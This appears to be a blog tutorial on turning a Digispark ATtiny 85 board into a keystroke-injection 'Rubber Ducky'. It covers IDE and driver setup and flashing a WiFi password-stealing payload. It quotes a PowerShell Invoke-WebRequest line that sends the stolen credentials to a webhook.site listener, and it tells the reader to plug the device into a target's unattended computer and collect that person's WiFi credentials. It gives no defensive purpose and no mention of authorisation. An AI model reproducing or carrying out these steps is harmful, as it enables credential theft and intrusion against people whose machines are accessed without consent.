The USB Rubber Ducky, made popular by Hak5 , is an amazing little tool. This innocent looking “USB Drive” actually emulates a computer keyboard and is capable of typing at incredible speeds. Plugging this device in an unlocked target computer allows you to extract passwords or install backdoors in a matter of seconds.

In this blog post, we’ll build our very own Rubber Ducky using an extremely cheap (and tiny) development board, the Digispark ATtiny 85.

Digispark ATtiny 85 board
Digispark ATtiny 85 board

Requirements

Hardware

You’ll only need to purchase 1 item: one or more Digispark ATtiny 85 boards:

Software

You’ll also need to download some software:

Getting started

Preparing the IDE

After installing the Arduino Integrated Development Environment (IDE), you’ll need to add an additional Board Manager. To do this, open the IDE software, click File > Preferences, and paste the following URL next to Additional Boards Manager URLs: http://digistump.com/package_digistump_index.json

You can now install the Board Manager for our ATtiny via Tools > Board “Arduino Uno” > Boards Manager…. In the textbox at the top, type digispark and install the Digistump AVR Boards board manager.

Installing the Digistump Arduino drivers

  • Download the drivers by downloading the Digistump.Drivers.zip from the abovementioned link
  • Unzip the downloaded zip
  • Run Install Drivers.exe

Preparing the payload

Next, we’ll want to get some firmware to flash to our ATtiny board.

We can find some payloads in this Github repo but searching online for “ATtiny Rubber Ducky” will find you others as well.
For example, you could grab the code for a WiFi password stealer .

Copy the code or download the file and open it in the Arduino IDE.
Modify the code where necessary.

Note that this payload sends the WiFi credentials to a webhook.
Make sure you modify the line that says powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS.
Add your own unique URL from https://webhook.site/ or replace the link with your own WebHook listener.

Flashing the payload on the board

You can now flash the code to the Digispark.
Make sure the IDE is setup for our ATtiny board.
Check that Tools > Board “Digispark (Default - 16.5mhz)" is selected.
Also check that the correct COM port is selected, e.g. Tools > Port “COM1”.

Hit the upload button and plug in the board once the status message asks you to do so.
If it was already plugged in, you may need to unplug it and plug it back it.

Once the upload is finished, you can remove the Digispark.

Using the Rubber Ducky

To make the board even more innocent-looking, or just to protect it against accidental bumping, you can put it in a 3D printed case, like one of these:

Take it with you to your target’s unattended computer and plug it in.
Once the LED turns on, the payload is finished and you can unplug the Digispark.

Keep an eye on your WebHook listener and you should soon see the WiFi credentials of your target appear in the output.

Rubber ducky with a USB stick
Happy hacking :)